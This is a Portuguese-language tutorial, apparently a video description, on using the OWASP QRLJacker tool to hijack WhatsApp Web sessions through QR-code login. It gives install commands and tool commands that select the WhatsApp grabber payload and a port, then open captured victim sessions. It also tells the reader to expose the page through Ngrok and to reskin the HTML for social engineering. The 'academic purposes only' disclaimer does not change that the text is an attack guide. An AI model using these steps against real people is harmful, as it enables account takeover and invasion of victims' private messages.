QRL Jacking – A New Social Engineering Attack Vector

Descrição

QRL Jacking – A New Social Engineering Attack Vector

 

——- Feito em localhost apenas para fins acadêmicos——-
Eu ajudo vocês e vocês me ajudam, façam uma doação em: https://bit.ly/2vgAZXz——-TUTORIAL—–1- Ter o firefox atualizado para ultima versão, conferir no site:https://www.mozilla.org/pt-BR/firefox/new/
2 – Baixar o plugin gecko e instalar ele seguindo os comandos abaixo em sequencia:
2.1 -Download https://github.com/mozilla/geckodriver/releases

chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

3 – Instalar o git:
git clone https://github.com/OWASP/QRLJacking
4- navegar até a pasta do QRLJacking
cd QRLJacking/QRLJacker
5 – Instalar o requirements.txt com comando:
python3.7 -m pip install -r requirements.txt
6 – rodar a o hack com comandno:
pýthon3.7 QRLJacking.PY

——————USANDO O HACK——–
1 – Abrir com comando $ python3.7 QRLJacking.py
2 – Listar o proximo comando com: list
3 – Setar a payload com comando: use grabber/whatsapp
4 – Setar a porta 1337 com comando: set port 1337
( esta porta deve estar aberta em seu modem/roteador)
5 – Rodar com o comando: run
———————–ENVIANDO O HACK————————-
1 – Seu hack estara aramdo no endereço: localhost:1337
2 – Este endereço pode ser distribuido via Ngrok
3 – A página HTML pode ser alterada para sua Engenharia Social sendo mantido somente o codigo QR.
——————RECEBENDO OS DADOS———–
1 – Apos armado e setado o hack, você pode ver as conexões ativas com comando:
sessions
2 – Voce pode selecionar a sessão ativa que quer hackear com o comando:
sessions -i 0 (ou 1,2, 3…. depende da conexão que vc quer setar o numero final.)

Links uteis:
https://github.com/OWASP/QRLJacking/tree/master/QRLJacker
https://github.com/OWASP/QRLJacking/commit
/7d0c767035015e3521e03b49ded9e2715a77925b
https://github.com/mozilla/geckodriver/releases